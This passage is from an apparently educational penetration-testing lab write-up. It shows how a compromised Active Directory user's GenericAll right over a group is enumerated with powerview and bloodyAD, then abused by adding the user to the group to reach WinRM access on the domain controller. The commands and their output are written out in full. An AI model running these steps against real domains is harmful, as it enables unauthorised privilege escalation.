GenericAll
During the BloodHound enumeration, it has been identified that the compromised
traacy.white
user has GenericAll privilege over the Remote Access
group, which is part of the Remote Management Users
group that allows WinRM access to the DC host; nara.nara-security.com
(192.168.209.30
)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -SecurityIdentifier tracy.white'
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:31:38] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:31:39] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=Remote Access,OU=remote,DC=nara-security,DC=com
ObjectSID : S-1-5-21-914744703-3800712539-3320214069-1115
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : None
InheritanceType : None
SecurityIdentifier : NARA-SECURITY\Tracy.White
ObjectDN : OU=remote,DC=nara-security,DC=com
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE
AccessMask : ControlAccess, CreateChild, DeleteChild, ReadProperty, WriteProperty, Self
ObjectAceFlags : None
InheritanceType : None
SecurityIdentifier : NARA-SECURITY\Tracy.White
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nara-security,DC=com
permission: WRITE
distinguishedName: CN=Tracy White,OU=staff,DC=nara-security,DC=com
permission: WRITE
distinguishedName: OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
distinguishedName: CN=Remote Access,OU=remote,DC=nara-security,DC=com
permission: CREATE_CHILD; WRITE
OWNER: WRITE
DACL: WRITE
This can be verified using powerview and bloodyAD.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache powerview NARA-SECURITY.COM/@nara.nara-security.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Add-DomainGroupMember -Identity "Remote Access" -Members tracy.white'
Logging directory is set to /home/kali/.powerview/logs/nara-security-nara.nara-security.com
[2025-07-01 16:35:24] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-07-01 16:35:24] User tracy.white successfully added to Remote Access
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache bloodyAD -d NARA-SECURITY.COM -k --host nara.nara-security.com --dc-ip $IP add groupMember 'Remote Access' 'tracy.white'
[+] tracy.white added to Remote Access
powerview and bloodyAD can be used to add the compromised tracy.white
user to the Remote Access
group.
Now that the compromised tracy.white
user has a transitive group membership to the Remote Management Users
group, direct WinRM access to the nara.nara-security.com
(192.168.209.30
) host is possible.